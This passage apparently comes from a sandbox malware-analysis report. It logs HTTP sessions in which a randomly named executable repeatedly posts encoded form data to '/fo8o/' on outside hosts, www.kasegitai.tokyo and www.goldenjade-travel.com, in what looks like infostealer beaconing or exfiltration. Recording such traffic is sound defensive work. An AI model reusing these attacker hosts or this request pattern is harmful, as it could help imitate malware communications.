Apr 26, 2024 10:07:12.586038113 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:07:12 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49712	202.172.28.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:14.982321024 CEST	1811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 66 57 4f 43 68 30 6b 53 65 66 56 31 48 2b 49 67 4b 6a 68 4a 72 62 45 53 6f 78 48 6e 57 64 73 70 4f 4c 64 62 4c 32 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 66 4f 77 64 36 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 62 69 74 4b 70 58 77 34 52 67 34 6a 57 31 30 57 7a 6c 47 72 63 6b 39 51 62 6b 4c 68 4f 72 77 77 46 75 6f 68 67 4a 57 75 75 52 71 44 56 38 76 6f 69 49 77 41 32 39 41 74 2b 79 61 55 47 4d 36 79 50 36 76 75 2f 30 61 2b 34 43 5a 46 4f 6b 31 31 73 30 42 79 36 59 57 74 46 2f 37 56 48 33 69 35 62 66 64 6a 4b 44 50 33 41 47 30 68 63 58 6a 7a 43 6b 43 43 71 39 59 4c 52 56 56 4b 74 6c 31 6f 55 38 6a 36 55 48 4e 70 6d 4d 34 6f 7a 39 45 72 30 31 74 79 75 61 43 59 6a 7a 7a 42 43 45 42 77 38 59 2f 45 32 7a 61 51 4a 62 6a 56 74 58 6b 56 61 6e 64 45 45 4b 68 31 74 68 45 39 56 53 6c 38 38 4f 35 57 30 6d 53 73 58 50 46 58 52 48 34 59 34 43 2b 2b 37 74 38 4a 61 32 74 76 59 77 43 57 72 4a 48 57 63 42 4d 36 45 55 36 34 75 58 66 43 55 79 61 76 79 30 55 7a 4b 32 6c 4b 57 62 37 6f 35 68 6e 73 38 53 66 70 35 76 38 30 4d 62 39 6a 70 30 35 34 32 46 49 4b 6e 55 76 68 67 57 44 42 67 53 72 37 46 65 5a 53 70 5a 75 6c 6b 69 2b 64 62 41 2b 70 45 61 43 6c 59 56 4e 48 6e 57 75 58 71 71 70 63 59 72 36 44 54 67 53 65 55 4d 48 6a 57 2f 38 64 4a 63 37 55 39 49 47 57 43 6b 69 76 2f 79 64 43 77 53 58 4e 6f 59 76 74 5a 39 49 6a 32 57 75 51 52 2f 61 6c 68 36 5a 55 48 79 42 6c 57 48 58 56 72 48 35 65 56 59 55 79 44 30 46 61 51 6d 42 36 48 33 78 70 61 55 34 46 54 72 37 6b 6a 78 69 4e 61 71 43 65 59 46 4d 2f 5a 69 42 70 71 52 69 46 6c 52 38 6f 31 73 72 6d 7a 79 58 4b 31 6e 4c 50 69 6f 63 43 35 50 63 42 4d 4b 37 6f 65 2b 6f 62 49 46 77 63 54 48 50 68 31 4d 5a 59 4e 77 52 35 41 48 78 63 39 71 45 6d 67 71 78 51 4b 58 46 36 38 62 4e 33 70 65 77 58 39 67 77 6a 37 34 66 32 32 75 57 46 46 51 6e 2f 64 36 66 64 77 5a 70 56 2b 53 45 41 32 47 79 35 7a 59 41 6e 77 4d 42 4e 6b 6a 50 76 4c 2f 77 4e 50 53 47 30 77 30 6a 77 47 68 56 6a 58 66 62 44 37 4e 4c 45 4e 75 35 4a 39 78 33 78 58 42 31 48 62 6d 33 5a 6d 6f 74 66 6d 44 77 4e 42 59 65 58 78 64 66 52 52 4a 31 4a 59 73 55 34 58 64 4d 38 78 73 34 5a 65 4d 7a 44 36 6b 35 43 51 6d 34 38 6f 37 38 41 79 34 48 5a 6d 77 6a 64 39 46 58 78 46 32 76 44 44 4d 33 4a 41 42 52 67 76 35 42 55 43 49 49 48 63 78 45 76 58 69 31 65 6a 47 4c 65 74 78 46 49 70 32 6c 55 5a 4e 50 65 49 75 4a 71 6d 53 71 7a 32 7a 7a 58 38 34 54 49 62 71 68 35 71 76 39 6c 59 77 7a 39 52 39 33 6e 48 70 74 45 4b 66 5a 63 78 63 52 4a 31 4b 64 6c 63 31 38 78 6a 55 45 63 73 46 68 63 2f 46 4d 72 43 74 76 33 6c 43 56 5a 4c 55 59 72 79 55 76 7a 77 53 33 6b 53 70 48 33 4e 58 67 4b 35 4e 37 53 67 32 51 4e 55 70 38 35 6f 73 70 69 4d 76 70 4f 6d 50 33 6e 6e 41 36 36 7a 70 63 62 4b 79 57 37 4a 4e 4f 70 6a 70 4a 6d 37 56 4a 63 6f 68 41 42 47 4c 53 2b 35 68 51 4a 35 68 79 41 51 46 2b 7a 42 6b 44 59 4f 56 39 6d 67 38 7a 30 69 62 2b 70 58 34 68 35 67 30 6e 34 68 30 4b 7a 4e 71 6b 55 6c 66 45 3d Data Ascii: OVFPBtpp=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFDzafWOCh0kSefV1H+IgKjhJrbESoxHnWdspOLdbL2N53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTtql3YXdfOwd6sRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFOk11s0By6YWtF/7VH3i5bfdjKDP3AG0hcXjzCkCCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01tyuaCYjzzBCEBw8Y/E2zaQJbjVtXkVandEEKh1thE9VSl88O5W0mSsXPFXRH4Y4C++7t8Ja2tvYwCWrJHWcBM6EU64uXfCUyavy0UzK2lKWb7o5hns8Sfp5v80Mb9jp0542FIKnUvhgWDBgSr7FeZSpZulki+dbA+pEaClYVNHnWuXqqpcYr6DTgSeUMHjW/8dJc7U9IGWCkiv/ydCwSXNoYvtZ9Ij2WuQR/alh6ZUHyBlWHXVrH5eVYUyD0FaQmB6H3xpaU4FTr7kjxiNaqCeYFM/ZiBpqRiFlR8o1srmzyXK1nLPiocC5PcBMK7oe+obIFwcTHPh1MZYNwR5AHxc9qEmgqxQKXF68bN3pewX9gwj74f22uWFFQn/d6fdwZpV+SEA2Gy5zYAnwMBNkjPvL/wNPSG0w0jwGhVjXfbD7NLENu5J9x3xXB1Hbm3ZmotfmDwNBYeXxdfRRJ1JYsU4XdM8xs4ZeMzD6k5CQm48o78Ay4HZmwjd9FXxF2vDDM3JABRgv5BUCIIHcxEvXi1ejGLetxFIp2lUZNPeIuJqmSqz2zzX84TIbqh5qv9lYwz9R93nHptEKfZcxcRJ1Kdlc18xjUEcsFhc/FMrCtv3lCVZLUYryUvzwS3kSpH3NXgK5N7Sg2QNUp85ospiMvpOmP3nnA66zpcbKyW7JNOpjpJm7VJcohABGLS+5hQJ5hyAQF+zBkDYOV9mg8z0ib+pX4h5g0n4h0KzNqkUlfE=
Apr 26, 2024 10:07:15.270483017 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:07:15 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49713	202.172.28.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:17.804876089 CEST	508	OUT	GET /fo8o/?OVFPBtpp=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOK51Mgi6ytQL9yeTtlbiBUAmNTsA==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:07:18.101933956 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:07:17 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49715	116.50.37.244	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:24.863276958 CEST	792	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47 Data Ascii: OVFPBtpp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
Apr 26, 2024 10:07:25.199361086 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 26 Apr 2024 08:07:24 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49716	116.50.37.244	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:27.736918926 CEST	816	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 62 79 42 6d 51 75 41 5a 72 6a 4d 6e 42 58 6e 43 59 61 2f 42 55 43 78 71 63 36 6e 51 3d 3d Data Ascii: OVFPBtpp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyBmQuAZrjMnBXnCYa/BUCxqc6nQ==
Apr 26, 2024 10:07:28.069649935 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 26 Apr 2024 08:07:27 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49717	116.50.37.244	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:30.817971945 CEST	1829	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 4c 6d 38 7a 47 66 75 46 57 32 35 65 38 33 59 2f 75 7a 4e 41 38 70 59 79 36 61 70 35 31 77 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 7a 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a 78 30 62 74 59 71 70 4e 4a 4f 66 4a 43 4c 46 62 66 68 5a 5a 69 77 6c 59 42 39 70 35 64 6b 4f 44 46 63 53 55 4f 70 7a 30 68 2f 6d 77 79 46 35 4f 4d 39 30 36 67 6d 37 5a 56 30 33 4a 36 64 4b 31 56 78 66 67 6f 6a 7a 36 69 42 34 51 70 4f 50 52 4d 57 63 6b 79 34 32 44 2f 6f 49 4a 31 70 54 33 55 6d 75 4b 32 41 7a 35 51 58 6d 62 70 65 79 58 31 79 4d 7a 38 4b 64 42 72 76 70 56 44 33 55 33 7a 6d 65 75 38 36 4f 2b 47 6b 43 6d 4e 77 58 37 72 49 56 56 46 32 4c 55 63 79 36 65 58 50 39 6e 6b 66 72 55 37 58 65 30 4c 53 7a 4d 51 55 6a 69 70 67 43 30 4f 46 43 2b 79 73 71 34 67 56 4d 79 7a 68 41 55 76 35 77 6a 69 67 7a 50 78 47 6b 43 63 77 70 56 59 33 69 6f 48 6a 69 69 46 49 76 51 36 41 52 31 43 37 6e 57 70 43 30 41 62 4c 62 49 4e 72 52 5a 42 6f 34 31 46 47 6f 63 68 41 4d 64 39 6c 4c 58 6e 62 4f 50 74 6b 63 64 75 63 4e 77 44 75 4b 43 35 77 42 30 41 50 31 66 38 34 59 5a 30 39 32 35 38 66 75 59 75 75 66 47 74 32 74 4f 76 30 37 45 45 6a 69 70 30 66 2b 49 43 34 33 71 36 68 67 71 4a 79 37 57 47 35 55 61 41 46 68 52 53 43 46 4c 38 66 4a 42 38 31 31 5a 64 52 39 39 64 6a 36 37 33 67 39 48 59 47 41 61 59 76 53 38 73 63 34 76 42 36 51 75 49 48 35 71 6f 74 48 64 37 74 71 32 34 6b 50 72 61 69 46 4a 6f 72 4d 58 46 46 78 47 4f 6c 50 43 62 36 4f 79 63 78 57 50 75 58 77 68 71 78 65 6b 34 53 44 68 74 7a 69 4b 76 6f 76 74 4d 67 35 35 47 6a 4c 32 49 4b 54 4d 7a 69 4f 62 55 77 77 55 64 52 37 32 73 49 45 74 70 41 6b 57 4e 6b 41 71 54 49 4a 70 6b 48 67 34 75 71 77 41 76 36 6d 72 2b 54 44 38 55 45 55 68 41 34 58 50 49 2f 43 67 53 46 63 35 46 68 32 6b 46 73 51 44 45 54 72 34 51 68 2f 42 43 48 53 41 5a 68 41 62 35 66 6b 75 34 44 2b 4c 54 47 72 48 61 61 65 46 67 6d 68 43 36 44 51 35 4d 4d 4d 42 38 74 47 7a 6b 4a 6b 56 32 72 71 75 42 64 4e 56 36 43 72 36 59 66 69 6f 32 61 55 2b 39 78 70 42 43 31 73 55 6f 71 4b 33 5a 45 2f 62 73 4a 33 37 58 30 51 47 35 52 79 72 4b 34 56 78 71 57 77 5a 79 71 2b 75 36 58 48 4a 42 44 6b 64 52 55 72 64 42 49 63 62 63 53 44 36 34 64 66 52 70 4b 35 51 31 4b 52 2f 68 79 54 50 56 49 79 57 33 78 51 43 43 78 34 6c 35 43 58 50 4d 72 37 63 59 6b 69 39 68 4b 70 68 2f 6e 41 43 59 77 5a 69 6e 6d 6e 64 45 75 68 61 64 6a 64 2b 63 4a 46 32 4f 2f 70 75 67 64 73 79 77 47 43 67 65 50 55 4c 38 54 56 44 73 2f 35 4d 2b 66 58 77 4f 61 6b 6b 57 55 76 5a 32 52 2f 61 73 4e 53 57 44 7a 67 79 4c 64 6e 31 36 36 70 41 4c 6b 37 57 4a 2f 55 49 45 42 4d 78 53 4d 7a 7a 75 74 38 38 46 39 4c 70 2f 6a 68 45 54 73 47 69 30 74 7a 37 62 55 6b 74 74 75 2f 4a 30 38 36 30 57 47 2f 39 69 4d 58 34 75 38 2f 65 74 32 51 74 56 49 39 47 58 71 63 4a 79 72 30 78 4d 50 4b 79 77 63 49 32 37 62 37 6b 4b 6a 54 43 46 6a 6d 78 31 51 45 37 58 6d 41 2f 79 39 38 76 4b 52 2b 74 6e 56 53 4a 45 3d Data Ascii: OVFPBtpp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnLm8zGfuFW25e83Y/uzNA8pYy6ap51w7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkzfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpOPRMWcky42D/oIJ1pT3UmuK2Az5QXmbpeyX1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rIVVF2LUcy6eXP9nkfrU7Xe0LSzMQUjipgC0OFC+ysq4gVMyzhAUv5wjigzPxGkCcwpVY3ioHjiiFIvQ6AR1C7nWpC0AbLbINrRZBo41FGochAMd9lLXnbOPtkcducNwDuKC5wB0AP1f84YZ09258fuYuufGt2tOv07EEjip0f+IC43q6hgqJy7WG5UaAFhRSCFL8fJB811ZdR99dj673g9HYGAaYvS8sc4vB6QuIH5qotHd7tq24kPraiFJorMXFFxGOlPCb6OycxWPuXwhqxek4SDhtziKvovtMg